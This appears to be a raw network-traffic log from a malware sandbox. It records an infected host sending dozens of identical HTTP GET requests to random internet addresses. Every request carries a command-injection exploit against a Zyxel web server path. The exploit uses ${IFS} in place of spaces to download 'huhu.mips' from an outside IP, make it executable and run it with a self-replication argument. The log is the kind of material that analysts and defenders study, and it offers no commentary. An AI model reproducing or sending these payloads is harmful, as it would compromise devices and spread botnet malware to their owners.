                                                Jan 29, 2024 07:08:03.658279896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8210192.168.2.2335146179.168.83.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658334017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8211192.168.2.235145041.81.90.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658349991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8212192.168.2.2335514208.46.176.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658394098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8213192.168.2.2345540203.239.152.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658427954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8214192.168.2.235995058.196.155.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658464909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8215192.168.2.2360680105.175.166.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658514977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8216192.168.2.2338364151.61.153.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658570051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8217192.168.2.2359850141.79.163.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658596992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8218192.168.2.2357594154.146.7.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658653975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8219192.168.2.2358428165.218.162.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658695936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8220192.168.2.235706419.185.18.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658761024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8221192.168.2.234381039.83.165.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658777952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8222192.168.2.235537275.51.196.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658839941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8223192.168.2.2333688171.25.253.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658876896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8224192.168.2.2348284120.82.48.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658941031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8225192.168.2.2339598138.89.208.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658984900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8226192.168.2.2337228209.188.175.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659014940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8227192.168.2.2346620102.37.99.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659061909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8228192.168.2.2346464160.84.230.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659112930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8229192.168.2.235233086.33.115.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659152031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8230192.168.2.2355472140.227.88.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659193039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8231192.168.2.234732450.169.215.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659250021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8232192.168.2.23406464.167.115.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659281015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8233192.168.2.2359934136.172.35.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659332991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8234192.168.2.235114489.39.168.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659359932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8235192.168.2.234138663.204.143.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659389019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8236192.168.2.2347906103.218.91.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659455061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8237192.168.2.234173449.83.241.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659491062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8238192.168.2.233430077.2.27.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659533978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8239192.168.2.2358080132.57.25.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659567118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8240192.168.2.234117299.39.197.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659687042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8241192.168.2.2348272153.217.90.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659713984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8242192.168.2.2339332203.232.23.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659765005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8243192.168.2.235601632.163.224.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659817934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8244192.168.2.2356166163.224.112.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659853935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8245192.168.2.2360362171.173.251.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659890890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8246192.168.2.234228478.131.220.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659945965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8247192.168.2.2338384175.43.230.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.659981012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8248192.168.2.233361646.108.182.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660017014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8249192.168.2.233719262.55.151.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660052061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8250192.168.2.233739844.12.176.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660087109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8251192.168.2.234702866.115.7.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660118103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8252192.168.2.233722251.247.248.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660171032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8253192.168.2.234070627.251.179.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660214901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8254192.168.2.2352542202.225.184.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660278082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8255192.168.2.234647687.232.101.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660322905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8256192.168.2.2348294171.133.125.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660350084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8257192.168.2.2360440173.116.113.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660409927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8258192.168.2.23520468.75.31.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660449982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8259192.168.2.2333210193.108.90.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660495043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8260192.168.2.2359346115.87.174.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660545111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8261192.168.2.2337414101.253.102.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660581112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8262192.168.2.2348982220.245.166.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660613060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8263192.168.2.2359178136.97.167.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660660982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8264192.168.2.234796081.151.86.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660712004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8265192.168.2.2351532147.177.56.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660738945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8266192.168.2.2352320131.110.92.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660765886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8267192.168.2.235301089.168.247.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660805941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8268192.168.2.234862666.226.75.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660839081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8269192.168.2.233650496.173.110.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660873890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8270192.168.2.2350092114.200.126.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.660943985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8271192.168.2.2341926129.42.249.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661000013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8272192.168.2.235746845.218.196.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661031961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8273192.168.2.2355986182.13.13.62443
                                                TimestampBytes transferredDirectionData
